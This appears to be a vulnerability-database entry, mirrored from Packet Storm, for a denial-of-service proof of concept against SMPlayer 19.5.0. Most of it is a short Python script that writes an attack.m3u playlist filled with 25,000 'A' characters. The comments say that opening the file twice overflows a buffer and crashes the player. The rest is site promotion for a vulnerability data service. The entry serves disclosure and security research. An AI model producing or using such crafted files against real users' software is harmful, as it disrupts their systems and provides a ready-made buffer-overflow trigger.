Lucene search
K

SMPlayer 19.5.0 Denial Of Service

🗓️ 25 Nov 2019 00:00:00Reported by Malav VyasType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 164 Views

SMPlayer 19.5.0 Denial Of Service Windows 7 (64 bit

Code
`# Title : SMPlayer 19.5.0 - Denial of Service (PoC)  
# Tested on : Windows 7 (64 bit)  
# Vulnerable Software: SMPlayer v 19.5.0  
# Exploit Author: Malav Vyas  
# Vendor Homepage: https://smplayer.info  
# Version : 19.5.0  
# Software Link : https://smplayer.info/en/downloads  
  
# POC  
# run this python file, which will generate attack.m3u file  
# .m3u file is used as a playlist  
# this python file will generate a .m3u file with 25000 "A" characters.  
# Open this file in SMPlayer two times.  
# second time, buffer would be successfully overflowed and it would result in a Denial Of Service attack.  
# For more details, please refer to video  
  
f="attack.m3u"  
  
bof = "A"*25000  
  
writeFile = open(f, "w")  
writeFile.write(bof)  
writeFile.close()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation